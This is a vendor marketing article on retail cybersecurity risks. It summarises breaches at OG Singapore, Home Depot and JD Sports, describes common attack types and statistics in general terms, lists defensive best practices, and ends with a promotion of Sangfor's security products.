Retail revenue growth stems from the vendor's ability to provide a seamless shopper experience by securely collaborating on location and online presence. Any disruption to the supply chain caused by cybersecurity in retail, including loss of customer data, employee information, or a breach of the point-of-sale system, will damage the vendor's brand and cause a ripple economic impact for years.
As retail digital transformation emerged, with the creation of a seamless customer experience, migration to the cloud, and complete interconnection between the stores and the back office, hackers and scammers have several exploiting opportunities to profit from this next-generation retail experience.
The Rise of Retail Cyberattacks and the Need for Retail Cybersecurity
Before the digital transformation and automation of retail, retailers used manual inventory counts, cash registers, and over-the-line credit card processing before e-commerce, global interlocking supply chains, and delivering the frictionless customer experience. These processes and systems were specific to a location and connected to a centralized back office. Mostly, these systems were closed-looped and siloed off, preventing a breach from propagating laterally. Hackers continue to breach several components simultaneously as more retail systems become interconnected, including e-commerce sites, databases, access control, and financial systems.
As e-commerce and traditional retail merged their efforts to grow top-end revenues, improve profitability, and streamline business operations, this also exposed several areas of customer data, credit card information, and the ability to breach several elements within the newly merged environment.
Embracing cybersecurity remained a mix of meeting compliance mandates like PCI-DSS and less about fully implementing adaptive controls across the various components within the store and online presence. This decision ultimately led to cybersecurity breaches, costing retailers millions in revenue loss, fines, and loss of consumer confidence.
Key Cybersecurity Risks in Retail
With each cybersecurity breach becoming more public and costly, retailers continue to increase their investment protection strategies, manage services to help monitor incident response and invest in cybersecurity awareness training.
Even with layers of protection becoming critical to a retailer, their data is still an attractive target for hackers.
Data Breaches “All About the Money”
That dollar amount continues to drive hackers' mobilization of attack efforts, including SQL injection, cross-site scripting, and password spraying, to steal data from retailers and e-commerce sites.
● Security breaches will also continue to plague e-commerce and retailers, affecting customer information, employee data, inventory information, supply chain connector data, and credit card transactions.
● IDC reported the growing interconnectivity of retail business ecosystems increases ransomware risks, with 36.4% of enterprises reporting that third-party supplier or customer systems were impacted.
OG Singapore (2022)
OG Singapore is a well-established retail chain that provides a wide array of quality products, catering to the diverse needs of its customers. With a strong focus on exceptional service and value, OG has become a beloved shopping destination for Singaporeans over the years.
Cost: Undetermined
The number of people affected is undetermined. The data breach affected a single database containing personal membership information.
Cause:
A third-party hosting system used by OG for membership portal services became compromised, possibly causing the data breach.
Resolution:
OG management emailed all customers affected by the security and warned of possible email phishing attacks. All users should check any emails coming from an OG domain to ensure this is not a hacker impersonating someone within the organization. The firm is working with law enforcement agencies in Singapore and security consultants to resolve this issue.
Home Depot
Home Depot is a leading home improvement retailer that offers a vast selection of tools, materials, and services for DIY enthusiasts and professional contractors alike. With a commitment to providing quality products and expert advice, Home Depot empowers customers to tackle their home projects with confidence.
Cost: 215 Million Dollars
Number of people affected: 52 Million.
Cause: Hackers compromised third-party login credentials to access internal systems. Find more details here . Once they gained access, they embedded malware across several point-of-sale machines to capture customer credit card details and transactions.
Resolution:
Home Depot paid nearly $17 million in fines to settle various lawsuits. However, the penalties were only a tiny portion of the $198 million needed to implement additional cybersecurity controls, processes, and employee training to help prevent similar future breaches.
JD Sport
JD Sports is a premier retailer specializing in sports fashion and footwear, offering a diverse range of popular brands and exclusive collections. With a focus on style and performance, JD Sports caters to athletes and trendsetters alike, making it a go-to destination for the latest in sportswear.
Cost: Undisclosed
Number of People Affected: 10 Million
Cause: Hackers accessed a database containing retail purchases from 2018 to 2020. Because of the data breach, the hackers exfiltrated sensitive customer information, including their name, delivery information, address, email, phone, and the last four digits of their credit card.
Resolution: JD Sport didn't provide any public details about its resolution strategy, remediation, or whether there were still any pending lawsuits.
The Most Common Types of Cyberattacks Affecting Retailers
While retailers face considerable challenges from several cybersecurity attacks, here are the most common challenges:
- Data Breaches
- Phishing Attacks
- Malware and Ransomware Attacks
- E-Skimming
- Insider Threats
Data Breaches
Statista estimates that global retail e-commerce sales were 5.8 trillion U.S. dollars, with projections showing a 39% growth. Global retail e-commerce sales will exceed eight trillion dollars by 2027.
That dollar amount continues to drive hackers' mobilization of attack efforts, including SQL injection, cross-site scripting, and password spraying, to steal data from retailers and e-commerce sites.
Security breaches will also continue to plague e-commerce and retailers, affecting customer information, employee data, inventory information, supply chain connector data, and credit card transactions.
Phishing Attacks
According to Deloitte, 91% of all cybersecurity attacks start with email phishing attacks. Hackers continue to increase the effectiveness of phishing attacks by leveraging ChatGPT to create adversarial artificial intelligence and machine learning tools to help craft well-created messages in several languages with near perfection. Phishing messages often contain malware files, malicious links, and rogue attachments.
Malware and Ransomware Attacks
Hackers similar to those who breached Home Depot used email phishing to distribute their malware files. Malware files allow the hacker to take control of a device, embed keyloggers, or encrypt the files as part of a ransomware attack.
Ransomware attacks against retailers are very challenging for them to prevent. The malware's attacking email could have come from a customer, supply chain partner, or fellow employee. Hackers will often impersonate these people when they execute business email compromise attacks.
E-Skimming
E-skimming continues to be a rising problem for retailers and e-commerce sites. Credit card skimmers are all too common within retail. Gas stations, restaurants, and retail outlets have all fallen victim to hackers installing credit card skimmers. E-skimmers are similar. Hackers inject code into an e-commerce website to intercept the buyer's credit card information. This attack vector continues to become a problem if e-commerce sites need to catch up in patching and updating their web pages to block malicious code injections from occurring.
Insider Threats
Retail has a high turnover rate. Many retail employees are hired for the season, and some get fired for retail theft.
Retail cybersecurity insider threat is another growing problem retailers face. Hackers will attempt to impersonate retail employees, inventory buyers, and finance personnel to get fraudulent invoices paid, inventory shipments redirected, or access bank transfers.
By the Numbers: Retail Cybersecurity Statistics
Retailers and online e-commerce business owners track several critical statistics when considering when and how they should upgrade their cybersecurity protection capabilities, expand their business, or decide to close down a retail location or website.
The Impact of Data Breaches on Retailers
Any data breach, regardless of location and size, remains detrimental to the retailer. Despite security standards, including NIST and ISO 27001, retailers must catch up to industries adopting security frameworks, even if this simplifies their requirement to meet PCI-DSS.
A concerning 62% of consumers are still determining the security of their data. Among this group, 25% need more confidence in retailers' ability to protect their information, highlighting the urgent need for retail organizations to rebuild consumer trust.
A hacker's access to customer data can cause current and future retail customers to lose confidence. A breach within the customer payment system can also lead to a loss of customer trust.
What is the Frequency of Retail Data Beaches in 2024?
- Retail organizations suffered the most significant number of cyber breaches because of the lack of budget (37%)
- A survey by Viking Cloud reveals that 80% of retailers faced cyberattacks last year, with most experiencing multiple incidents, including malicious software attacks against their websites, attempts at fraudulent transactions, and a breach against their secure payment gateway.
What is the Average Cost of a Data Breach in the Retail Industry 2024?
In the retail and consumer sectors, IBM reported that, in 2024, the average cost of a security breach was $3.91 million and $3.48 million, respectively. Despite being lower than the global average, retailers' costs increased 18% yearly, showing a rapid rise in risk.
Cybersecurity in Retail - Unique and Challenging to Prevent
Retail security vulnerabilities exist within many layers. The retail website, the backend database, username and password access control, and cloud storage are just a few areas that often become targets of hackers.
Cyber risk is part of the landscape within e-commerce businesses. E-commerce sites often start with fundamental components with little cybersecurity protection, except for security capabilities embedded by the web hosting company within the application or security solutions installed during the initial site creation.
Ultimately, the top priority for retailers with their online presence is getting the platform operational at the lowest possible cost. Retail product margins are shallow. These businesses rely on volume, return business, and low returns. Previously, store operations frowned upon cybersecurity tools, including anti-virus, patching, and backups, because they believed these tools slowed down retail and online transactions.
Threat actors are well aware of this dilemma. They will increase their attack vectors by looking for retailers that deploy minimum e-commerce cybersecurity teams or install manual physical security controls within the local stores.
How Important is Cloud Security in Preventing Persistent Threats?
The cloud becomes the most significant component as more retailers merge their onsite and online retail commerce strategies. With the cloud, retailers can share a typical supply chain and ecosystem to support on-location and e-commerce. The cloud also provides strong cybersecurity protection capabilities and redundancy. However, the retailer is responsible for data protection and ownership. Retailers still need to invest in tools to protect their valuable information.
Best Practices for Retail Cybersecurity and Online Businesses
What are the most critical adaptive controls all retail and e-commerce providers need to implement to help reduce the attack surface within retail?
- Strong passwords and multifactor authentication are critical in stopping attacks. Weak passwords allow bad actors to inject malicious code, steal data, and reduce retail's overall security posture. Enabling a solid password process and MFA across all elements of retail POS and e-commerce helps reduce hackers' ability to gain access to valuable data.
- Regular Security Audits and Penetration Testing by a third-party assessment team are critical for identifying known vulnerabilities and weaknesses in the enterprise. Assessments and penetration testing are required for PCI-DSS compliance.
- Maintaining PCI-DSS Compliance year-round, not just during the auditing period, requires implementing and sustaining the ISO 27001 security framework. This effort carries over to helping sustain PCI-DSS.
- Employee Training and awareness continue to be a positive factor in reducing email phishing attacks, social engineering, and employee impersonation attacks within retail stores. Awareness training, especially content based on real-world retail business cyberattacks and other common threats, helps teach employees, contractors, and business partners the importance of retail cybersecurity.
- Data encryption is required for PCI-DSS compliance. Ensuring all retail and e-commerce-related data is encrypted in transit and at rest is essential.
- Network Security, especially within cloud instances, retail stores, and on-premise data centers, must include network segmentation, next-generation firewalls, email security solutions, data encryption, and anti-virus and anti-malware components.
- Investing in automated incident response is critical for retailers to shield against next-generation AI-enabled attacks. AI-enabled attacks allow hackers to adjust their attack vectors within seconds, including changing the context, velocity, and location.
- Along with automated incident response, endpoint security integrated within extended detection and response (XDR) AI-powered solutions helps further reduce retail attack surfaces.
How Can Sangfor Help You Protect Your Retail Data?
Retail and e-commerce will continue to merge their supply chains' data protection and reduce physical and cybersecurity theft. Implementing cybersecurity for retail requires a continuous commitment from the leadership team to invest in technology, people, and processes to reduce the attack surface and cost per breach within the retail sector.
Sangfor's wide range of security & cloud products and services, including extended detection and response, next-generation firewalls, and secured hyper-converged platforms continue to make it a preferred partner across many industries, including finance, healthcare, retail, and customer services.
Click here to schedule your first initial consultation today!
